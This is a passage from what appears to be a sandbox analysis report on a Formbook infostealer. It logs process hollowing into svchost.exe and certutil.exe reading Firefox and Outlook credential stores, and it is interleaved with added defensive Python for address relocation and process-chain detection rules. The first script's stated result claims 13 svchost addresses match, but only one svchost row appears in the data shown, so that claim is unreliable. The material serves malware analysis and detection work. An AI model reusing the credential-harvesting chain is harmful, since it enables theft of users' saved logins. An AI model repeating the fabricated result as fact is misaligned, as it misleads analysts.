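Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D41A2
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056E01AA
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056D81CC
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_056B2000
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05644750
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_05620770
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0561C7C0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0563C6E0
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_032B1960
Source: C:\Windows\SysWOW64\certutil.exe | Code function: 14_2_0543C07C
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0568EA12 appears 86 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0560B970 appears 277 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 0569F290 appears 105 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 05655130 appears 58 times
Source: C:\Windows\SysWOW64\certutil.exe | Code function: String function: 05667E54 appears 111 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 00697F41 appears 35 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 006B0D27 appears 70 times
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: String function: 006B8B40 appears 42 times
"""

# Source path up to the image name, then either the "N_2_" function prefix or
# the "String function:" label, then the 8-digit hex address. Tolerates the raw
# extracted form in which the source and detail columns run together.
ROW_RE = re.compile(
    r"Source:\s*(?P<src>.*?\.exe).*?"
    r"(?:\d+_\d+_|String function:\s*)"
    r"(?P<addr>[0-9A-Fa-f]{8})"
)


def parse_functions(text):
    """Map each process image name to the set of function start addresses listed for it."""
    funcs = defaultdict(set)
    for line in text.splitlines():
        m = ROW_RE.search(line)
        if m:
            image = m.group("src").replace("\\", "/").rsplit("/", 1)[-1].lower()
            funcs[image].add(int(m.group("addr"), 16))
    return funcs


def best_relocation(src_addrs, dst_addrs):
    """Single base delta that maps the most of src_addrs onto dst_addrs, with the match count.

    If the same module is mapped in both processes at different bases, one delta
    sends every address in src_addrs onto an address in dst_addrs.
    """
    if not src_addrs or not dst_addrs:
        return 0, 0
    deltas = Counter(dst - src for src in src_addrs for dst in dst_addrs)
    delta, matched = deltas.most_common(1)[0]
    return delta, matched


def compare_processes(funcs, image_a, image_b):
    """Relocation check of image_a's function starts against image_b's."""
    a, b = funcs.get(image_a, set()), funcs.get(image_b, set())
    delta, matched = best_relocation(a, b)
    return {"delta": delta, "matched": matched, "total": len(a),
            "same_module": bool(a) and matched == len(a)}


if __name__ == "__main__":
    funcs = parse_functions(REPORT_ROWS)
    for a, b in (("svchost.exe", "certutil.exe"),
                 ("documente de expediere.exe", "certutil.exe")):
        r = compare_processes(funcs, a, b)
        print(f"{a} -> {b}: delta=0x{r['delta']:08X} "
              f"matched {r['matched']}/{r['total']} same_module={r['same_module']}")
```

For the rows above the script reports a delta of 0x025E0000 with all 13 svchost.exe addresses landing on certutil.exe addresses, while none of the dropper's own string functions relocate onto anything in certutil.exe. Run it against the complete listing (the regex accepts the raw report rows too) when you need the same answer for every function rather than this subset.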
Source: Documente de expediere.exe, 00000000.00000003.1254070960.000000000415D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Documente de expediere.exe
Source: Documente de expediere.exe, 00000000.00000003.1255841027.0000000003FB3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Documente de expediere.exe
Source: Documente de expediere.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: QAWHbhvedb.exe, 0000000F.00000002.3712964134.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1610084402.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;.VBp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/9
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006FA2D5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006E8713 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006E8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006FB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_0070F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_006FC602 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00694FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Documente de expediere.exe | File created: C:\Users\user~1\AppData\Local\Temp\autD782.tmp
Source: Documente de expediere.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Documente de expediere.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: certutil.exe, 0000000E.00000002.3705861434.00000000036A8000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1782329374.000000000367A000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3705861434.000000000367A000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3705861434.0000000003685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Documente de expediere.exe | ReversingLabs: Detection: 73%
Source: Documente de expediere.exe | Virustotal: Detection: 50%
Source: unknown | Process created: C:\Users\user\Desktop\Documente de expediere.exe "C:\Users\user\Desktop\Documente de expediere.exe"
Source: C:\Users\user\Desktop\Documente de expediere.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Documente de expediere.exe"
Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe | Process created: C:\Windows\SysWOW64\certutil.exe "C:\Windows\SysWOW64\certutil.exe"
Source: C:\Windows\SysWOW64\certutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
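The process chain above is what the "Sigma detected: Suspicious Process Parents" signature in the overview refers to: a SysWOW64 svchost.exe whose command line still names the dropper and whose parent is the dropper rather than services.exe, certutil.exe started by an executable sitting in a randomly named directory under Program Files (x86), and certutil.exe in turn launching Firefox (the step behind "Tries to harvest and steal browser information"). The Python below is an added example, not part of the report or of Joe Sandbox, that encodes those checks as rules over constructed Sysmon-style process-creation records mirroring the chain. The field names, the LOLBin and browser lists, and the explorer.exe parent of the dropper (the report lists it as "unknown") are assumptions.

```python
import ntpath

# Constructed Sysmon Event ID 1 style records mirroring the report's chain;
# PIDs follow the report's process numbering. The dropper's own parent is an
# assumption, and the last record is a benign svchost.exe start used as a control.
EVENTS = [
    {"pid": 0, "image": r"C:\Users\user\Desktop\Documente de expediere.exe",
     "cmdline": r'"C:\Users\user\Desktop\Documente de expediere.exe"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 2, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\Documente de expediere.exe"',
     "parent_image": r"C:\Users\user\Desktop\Documente de expediere.exe"},
    {"pid": 14, "image": r"C:\Windows\SysWOW64\certutil.exe",
     "cmdline": r'"C:\Windows\SysWOW64\certutil.exe"',
     "parent_image": r"C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe"},
    {"pid": 15, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "parent_image": r"C:\Windows\SysWOW64\certutil.exe"},
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "parent_image": r"C:\Windows\System32\services.exe"},
]

# Assumed reference lists; tune them to the environment being monitored.
EXPECTED_PARENTS = {"svchost.exe": {"services.exe"}}
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SYSTEM_DIR = "c:\\windows\\"


def _basename(path):
    return ntpath.basename(path).lower()


def _cmdline_image(cmdline):
    """Executable named by a command line: the quoted first token, else the first whitespace-delimited one."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def detect(events):
    """Return (pid, rule_id, detail) findings for a list of process-creation records."""
    findings = []
    for ev in events:
        image = _basename(ev["image"])
        parent = _basename(ev["parent_image"])
        claimed = _basename(_cmdline_image(ev["cmdline"]))
        # Hollowed or injected child: the image on disk is not the one its command line names.
        if claimed and claimed != image:
            findings.append((ev["pid"], "cmdline_mismatch", f"{image} run as {claimed}"))
        # Service hosts should only ever be started by services.exe.
        if image in EXPECTED_PARENTS and parent not in EXPECTED_PARENTS[image]:
            findings.append((ev["pid"], "unexpected_parent", f"{image} started by {parent}"))
        # A signed system utility launching a browser is the credential-dump step.
        if parent in LOLBINS and image in BROWSERS:
            findings.append((ev["pid"], "lolbin_spawns_browser", f"{parent} launched {image}"))
        # A system utility started by something living outside C:\Windows.
        if image in LOLBINS and not ev["parent_image"].lower().startswith(SYSTEM_DIR):
            findings.append((ev["pid"], "lolbin_nonsystem_parent",
                             f"{image} started by {ev['parent_image']}"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

On the records above the dropper (PID 0) and the control svchost.exe stay silent; PID 2 trips both the command-line mismatch and the unexpected-parent rule, PID 14 trips the non-system-parent rule, and PID 15 trips the browser-from-LOLBin rule. The command-line parser only understands a quoted or space-free first token, which is enough for Sysmon's CommandLine field in these cases but not for unquoted paths containing spaces.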
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Documente de expediere.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Documente de expediere.exe Static file information: File size 1168384 > 1048576
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Documente de expediere.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAWHbhvedb.exe, 0000000D.00000002.3704141726.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp, QAWHbhvedb.exe, 0000000F.00000000.1609949459.0000000000B0E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Documente de expediere.exe, 00000000.00000003.1253941006.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, Documente de expediere.exe, 00000000.00000003.1256736614.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1430299412.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428303783.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1543353346.000000000319E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, certutil.exe, 0000000E.00000002.3714307025.00000000055E0000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3714307025.000000000577E000.00000040.00001000.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1544921671.0000000005438000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000003.1541505660.000000000528A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: certutil.pdb source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: certutil.exe, 0000000E.00000002.3705861434.0000000003601000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.3715079219.0000000005C0C000.00000004.10000000.00040000.00000000.sdmp, QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000002B3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1899080068.0000000001CDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: certutil.pdbGCTL source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp, QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
            Source: Documente de expediere.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Documente de expediere.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Documente de expediere.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Documente de expediere.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Documente de expediere.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_0070C304 LoadLibraryA,GetProcAddress, 0_2_0070C304
            Source: C:\Users\user\Desktop\Documente de expediere.exe Code function: 0_2_006B8B85 push ecx; ret 0_2_006B8B98
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00423063 push edi; retf 2_2_0042306C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00411827 push esp; ret 2_2_00411830
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004121D9 push ebx; iretd 2_2_0041220A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D1DE push cs; iretd 2_2_0040D1DF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004121E3 push ebx; iretd 2_2_0041220A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004181EB push ss; ret 2_2_004181EC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004089AA push es; iretd 2_2_004089B2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004052ED push 00000019h; retf 2_2_004052EF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041E3AD push A41E6336h; iretd 2_2_0041E3DC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040AC69 push es; iretd 2_2_0040AC6A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403400 push eax; ret 2_2_00403402
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408511 push ebp; retf 2_2_0040851A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A645 push ebx; iretd 2_2_0041A656
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300225F pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030027FA pushad ; ret 2_2_030027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
